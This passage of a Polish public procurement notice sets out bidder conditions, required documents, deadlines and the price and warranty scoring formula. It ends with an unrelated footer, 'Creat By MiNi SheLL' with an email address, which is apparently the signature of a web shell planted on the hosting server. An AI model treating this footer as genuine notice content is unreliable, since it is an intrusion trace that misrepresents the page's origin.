r. poz. 507), <br/>–	złożył ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp.<br/>4)	Zamawiający w zakresie sytuacji ekonomicznej lub finansowej: nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>5)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę, doświadczenie i dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.<br/>6)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku: <br/>–	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>–	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <br/>7)	Przez Wykonawców wspólnie ubiegających się o zamówienie rozumie się np. konsorcjum firm, spółkę cywilną. W przypadku Wykonawców będących spółką cywilną, zaleca się, aby pełnomocnictwo do reprezentowania wspólników jako Wykonawców wspólnie ubiegających się o zamówienie, zostało podpisane przez wszystkich wspólników spółki cywilnej.<br/>8)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>9)	Jeżeli w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia działa osoba, której umocowanie do jego reprezentowania nie wynika z pełnomocnictwa, Zamawiający w toku postępowania wezwie Wykonawcę do złożenia stosownego pełnomocnictwa. Zaleca się, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w złożonym na wezwanie pełnomocnictwie lub w odrębnym oświadczeniu, potwierdzili czynności dokonane przez tzw. pełnomocnika rzekomego w okresie, kiedy nie posiadał on stosownego umocowania, pod rygorem nieważności czynności prawnej dokonanej w cudzym imieniu bez umocowania lub z przekroczeniem jego zakresu.<br/>10)	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca może polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118– 123 ustawy Pzp. Podmiot trzeci na potencjał, którego Wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 Pzp.<br/>11)	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>12)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania przez Wykonawcę firm podwykonawców.<br/>13)	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.<br/>14)	Wykonawca może złożyć oferty na każdą z części postępowania przy zachowaniu zasady: jedna oferta na jedną część. W przypadku, gdy Wykonawca złoży więcej niż jedną ofertę na daną część (samodzielnie lub wspólnie z innymi Wykonawcami), wszystkie oferty Wykonawcy złożone na tę część zostaną odrzucone. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie, o których mowa w art. 125 ust. 1 ustawy Pzp, stanowiące wstępne potwierdzenie, że wykonawca na dzień składania ofert nie podlega wykluczeniu.<br/>a)	Oświadczenia należy złożyć wg wymogów zał. nr 4 do SWZ.<br/>b)	Jeżeli wykonawca nie złożył oświadczeń, o których mowa w pkt 1 lub jest ono niekompletne lub zawierają błędy, zamawiający wezwie wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania.<br/>c)	Złożenie, uzupełnienie lub poprawienie oświadczeń, o których mowa w pkt 1 nie może służyć potwierdzeniu spełniania kryteriów selekcji.<br/>d)	Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych oświadczeń, o których mowa w pkt 1.<br/>e)	Jeżeli złożone przez wykonawcę oświadczenia, o których mowa w pkt 1 budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny braku podstaw wykluczenia wykonawcy, o przedstawienie takich informacji lub dokumentów</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>a)	Odpisu lub informacji z KRS lub z CEiIDG, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w przypadku oferty składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ten składa każdy z Wykonawców oddzielnie. Chyba, że Wykonawca wskaże dostępność tego dokumentu w formie elektronicznej pod określonym adresem internetowym ogólnodostępnej i bezpłatnej bazy danych i Zamawiający może pobrać go samodzielnie z tej bazy danych.<br/>b)	Informacja z KRK w zakresie określonym w następujących przepisach Pzp: art. 108 ust. 1 pkt 1 i 2 ustawy Pzp, art. 108 ust. 1 pkt 4 ustawy Pzp, odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>c)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie Wykonawcy o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 3 do SWZ. <br/>d)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (Zał. nr 6 do SWZ), w zakresie podstaw wykluczenia z postępowania określonych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 ustawy Pzp, art. 108 ust. 1 pkt 4 ustawy Pzp odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy Pzp odnośnie do zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	oświadczenie wykonawcy o braku istnienia okoliczności wskazanych w art. 7 ust 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U z 2024 r. poz. 507) - Zał. nr 5 do SWZ,<br/>f)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami RP zamiast: odpisu albo informacji z KRS lub z CEiIDG, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument, o którym mowa ppkt. e) powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> e.	Zamawiający żąda, na podstawie art. 106 ustawy, by Wykonawcy złożyli wraz z ofertą przedmiotowe środki dowodowe na potwierdzenie, że oferowane dostawy spełniają określone przez zamawiającego wymagania, cechy lub kryteria, gdyż są one niezbędne do przeprowadzenia postępowania.<br/>Przedmiotowymi środkami dowodowymi są: karty katalogowe producenta oferowanego przedmiotu zamówienia lub wydruki ze stron internetowych producenta oferowanego przedmiotu zamówienia. Przez wydruki ze stron internetowych Zamawiający rozumie pliki takie jak zrzuty ekranu lub strony www zapisane w formacie pdf.<br/>Dodatkowo w ramach części VII Wykonawca zobowiązany jest złożyć wraz z ofertą wydruk strony benchmarków. Wydruk taki musi zawierać dane umożliwiające identyfikację strony internetowej, z której dokonano wydruku, oraz datę wydruku (osiągnięcia określonego wyniku.<br/>UWAGA! Wydruki stron internetowych winny zawierać adres tych stron oraz datę i godzinę pobrania wydruku. <br/>Wymaganie, dotyczące złożenia kart katalogowych dotyczy części I, IV, V, VII postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku: <br/>–	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>–	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <br/>2)	Przez Wykonawców wspólnie ubiegających się o zamówienie rozumie się np. konsorcjum firm, spółkę cywilną. W przypadku Wykonawców będących spółką cywilną, zaleca się, aby pełnomocnictwo do reprezentowania wspólników jako Wykonawców wspólnie ubiegających się o zamówienie, zostało podpisane przez wszystkich wspólników spółki cywilnej.<br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>4)	Jeżeli w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia działa osoba, której umocowanie do jego reprezentowania nie wynika z pełnomocnictwa, Zamawiający w toku postępowania wezwie Wykonawcę do złożenia stosownego pełnomocnictwa. Zaleca się, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w złożonym na wezwanie pełnomocnictwie lub w odrębnym oświadczeniu, potwierdzili czynności dokonane przez tzw. pełnomocnika rzekomego w okresie, kiedy nie posiadał on stosownego umocowania, pod rygorem nieważności czynności prawnej dokonanej w cudzym imieniu bez umocowania lub z przekroczeniem jego zakresu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-10 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> a)	CENA – 60% <br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. Otrzymaną liczbę punktów Zamawiający obliczy wg poniższych zasad: <br/> <br/>Pkt = (Cena najniższa przedstawiona przez Wykonawców x 100 pkt x 60% )/( Cena oferty badanej ) <br/> <br/>b)	OKRES GWARANCJI/LICENCJI – 40% <br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium okres gwarancji/licencji. Otrzymaną liczbę punktów Zamawiający obliczy wg poniższych zasad: <br/> <br/> Pktg = (GO x 100 pkt x 40%) / Gmax <br/>gdzie: <br/>Pktg – liczba punktów przyznana danej ofercie w kryterium gwarancja/okres licencji; <br/>Gmax – maksymalny punktowany okres gwarancji/licencji; <br/>GO – okres gwarancji/licencji w ofercie ocenianej; <br/><br/>Uwaga dla części I, II, III, IV, V, VII : <br/>a)	Okres gwarancji należy podać w miesiącach w formularzu ofertowym. Jeżeli Wykonawca poda okres gwarancji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy. <br/>b)	MINIMALNY wymagany przez Zamawiającego okres gwarancji na dostarczone przedmioty wynosi: <br/>− dla części I, II, III, IV, V, VII: 24 miesiące od daty montażu;<br/>c)	W przypadku podania przez Wykonawcę krótszego niż wymagany okresu gwarancji, oferta Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia. <br/>d)	Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający przyjmie, że Wykonawca oferuje minimalny wymagany dla danej części przedmiotu zamówienia okres gwarancji;<br/>e)	Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach, np. 24 miesiące. Jeżeli Wykonawca nie wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający przyjmie, że Wykonawca zaoferował najkrótszy podany okres gwarancji;<br/><br/>Uwaga dla części VI:<br/>a)	Okres licencji należy podać w miesiącach w formularzu ofertowym. Jeżeli Wykonawca poda okres licencji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy. <br/>b)	MINIMALNY wymagany przez Zamawiającego okres licencji na oprogramowanie dietetyczne wynosi: <br/>− dla części VII: 12 miesiące od daty instalacji;<br/>c)	W przypadku podania przez Wykonawcę krótszego niż wymagany okresu licencji, oferta Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia. <br/>d)	Jeżeli Wykonawca nie wskaże w ofercie okresu licencji, Zamawiający przyjmie, że Wykonawca oferuje minimalny wymagany dla danej części przedmiotu zamówienia okres licencji;

Creat By MiNi SheLL
Email: jattceo@gmail.com